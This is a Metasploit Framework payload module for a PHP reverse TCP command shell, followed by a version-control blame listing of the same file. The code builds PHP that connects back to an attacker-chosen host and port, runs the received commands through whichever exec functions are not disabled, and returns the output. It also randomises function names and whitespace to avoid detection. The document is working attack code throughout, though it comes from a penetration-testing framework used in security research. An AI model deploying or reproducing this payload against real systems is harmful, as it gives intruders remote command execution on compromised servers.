modules/payloads/singles/php/reverse_php.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'


module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Php

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'PHP Command Shell, Reverse TCP (via php)',
			'Version'       => '$Revision$',
			'Description'   => 'Reverse PHP connect back shell with checks for disabled functions',
			'Author'        => 'egypt',
			'License'       => BSD_LICENSE,
			'Platform'      => 'php',
			'Arch'          => ARCH_PHP,
			'Handler'       => Msf::Handler::ReverseTcp,
			'Session'       => Msf::Sessions::CommandShell,
			'PayloadType'   => 'cmd',
			'Payload'       =>
				{
					'Offsets' => { },
					'Payload' => ''
				}
			))
	end

	#
	# Issues
	#   - Since each command is executed in a new shell, 'cd' does nothing.
	#      Perhaps it should be special-cased to call chdir()
	#   - Tries to get around disable_functions but makes no attempts to 
	#      circumvent safe mode.  
	#
	def php_reverse_shell

		if (!datastore['LHOST'] or datastore['LHOST'].empty?)
			# datastore is empty on msfconsole startup
			ipaddr = 0x7f000001
			port = 4444
		else
			ipaddr = datastore['LHOST'].split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first
			port = datastore['LPORT']
		end
		exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)

		shell=<<-END_OF_PHP_CODE
		$ipaddr=long2ip(#{ipaddr});
		$port=#{port};
		#{php_preamble({:disabled_varname => "$dis"})}

		if(!function_exists('#{exec_funcname}')){
			function #{exec_funcname}($c){
				global$dis;
				#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
				return$o;
			}
		}
		$nofuncs='no exec functions';
		if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
			$s=@fsockopen($ipaddr,$port);
			while($c=fread($s,2048)){
				$out=#{exec_funcname}(substr($c,0,-1));
				if($out===false){
					fwrite($s,$nofuncs);
					break;
				}
				fwrite($s,$out);
			}
			fclose($s);
		}else{
			$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
			@socket_connect($s,$ipaddr,$port);
			@socket_write($s,"socket_create");
			while($c=@socket_read($s,2048)){
				$out=#{exec_funcname}(substr($c,0,-1));
				if($out===false){
					@socket_write($s,$nofuncs);
					break;
				}
				@socket_write($s,$out,strlen($out));
			}
			@socket_close($s);
		}
		END_OF_PHP_CODE

		# randomize the spaces a bit
		Rex::Text.randomize_space(shell)

		return shell
	end

	#
	# Constructs the payload
	#
	def generate
		return super + php_reverse_shell
	end
	
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`# $Id$`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`


new payloads from diaul 2006-12-18 22:06:19 +00:00			`require 'msf/core'`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`require 'msf/core/payload/php'`
new payloads from diaul 2006-12-18 22:06:19 +00:00			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`


This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`module Metasploit3`
new payloads from diaul 2006-12-18 22:06:19 +00:00
			`include Msf::Payload::Single`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`include Msf::Payload::Php`
new payloads from diaul 2006-12-18 22:06:19 +00:00
			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'PHP Command Shell, Reverse TCP (via php)',`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`'Version' => '$Revision$',`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`'Description' => 'Reverse PHP connect back shell with checks for disabled functions',`
fix author field 2009-04-30 06:10:12 +00:00			`'Author' => 'egypt',`
new payloads from diaul 2006-12-18 22:06:19 +00:00			`'License' => BSD_LICENSE,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'cmd',`
			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`

More reliable reverse shell 2008-03-04 07:34:26 +00:00			`#`
			`# Issues`
			`# - Since each command is executed in a new shell, 'cd' does nothing.`
			`# Perhaps it should be special-cased to call chdir()`
			`# - Tries to get around disable_functions but makes no attempts to`
			`# circumvent safe mode.`
new payloads from diaul 2006-12-18 22:06:19 +00:00			`#`
			`def php_reverse_shell`
Updates from diaul 2007-02-04 01:53:43 +00:00
Fix empty LHOST problem and space generation 2008-03-04 20:50:39 +00:00			`if (!datastore['LHOST'] or datastore['LHOST'].empty?)`
Really fix the empty LHOST bug 2008-03-04 21:40:04 +00:00			`# datastore is empty on msfconsole startup`
			`ipaddr = 0x7f000001`
			`port = 4444`
			`else`
			`ipaddr = datastore['LHOST'].split(/\./).map{\|c\| c.to_i}.pack("C*").unpack("N").first`
			`port = datastore['LPORT']`
Fix empty LHOST problem and space generation 2008-03-04 20:50:39 +00:00			`end`
actually randomize myexec function name 2008-10-13 05:31:36 +00:00			`exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)`
More reliable reverse shell 2008-03-04 07:34:26 +00:00
			`shell=<<-END_OF_PHP_CODE`
			`$ipaddr=long2ip(#{ipaddr});`
			`$port=#{port};`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`#{php_preamble({:disabled_varname => "$dis"})}`

actually randomize myexec function name 2008-10-13 05:31:36 +00:00			`if(!function_exists('#{exec_funcname}')){`
			`function #{exec_funcname}($c){`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`global$dis;`
			`#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}`
			`return$o;`
			`}`
			`}`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`$nofuncs='no exec functions';`
			`if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`$s=@fsockopen($ipaddr,$port);`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`while($c=fread($s,2048)){`
actually randomize myexec function name 2008-10-13 05:31:36 +00:00			`$out=#{exec_funcname}(substr($c,0,-1));`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`if($out===false){`
			`fwrite($s,$nofuncs);`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`break;`
			`}`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`fwrite($s,$out);`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`fclose($s);`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}else{`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);`
			`@socket_connect($s,$ipaddr,$port);`
			`@socket_write($s,"socket_create");`
			`while($c=@socket_read($s,2048)){`
actually randomize myexec function name 2008-10-13 05:31:36 +00:00			`$out=#{exec_funcname}(substr($c,0,-1));`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`if($out===false){`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`@socket_write($s,$nofuncs);`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`break;`
			`}`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`@socket_write($s,$out,strlen($out));`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`@socket_close($s);`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}`
			`END_OF_PHP_CODE`
new payloads from diaul 2006-12-18 22:06:19 +00:00
Fix empty LHOST problem and space generation 2008-03-04 20:50:39 +00:00			`# randomize the spaces a bit`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`Rex::Text.randomize_space(shell)`
new payloads from diaul 2006-12-18 22:06:19 +00:00
			`return shell`
			`end`

			`#`
			`# Constructs the payload`
			`#`
			`def generate`
			`return super + php_reverse_shell`
			`end`

fix author field 2009-04-30 06:10:12 +00:00			`end`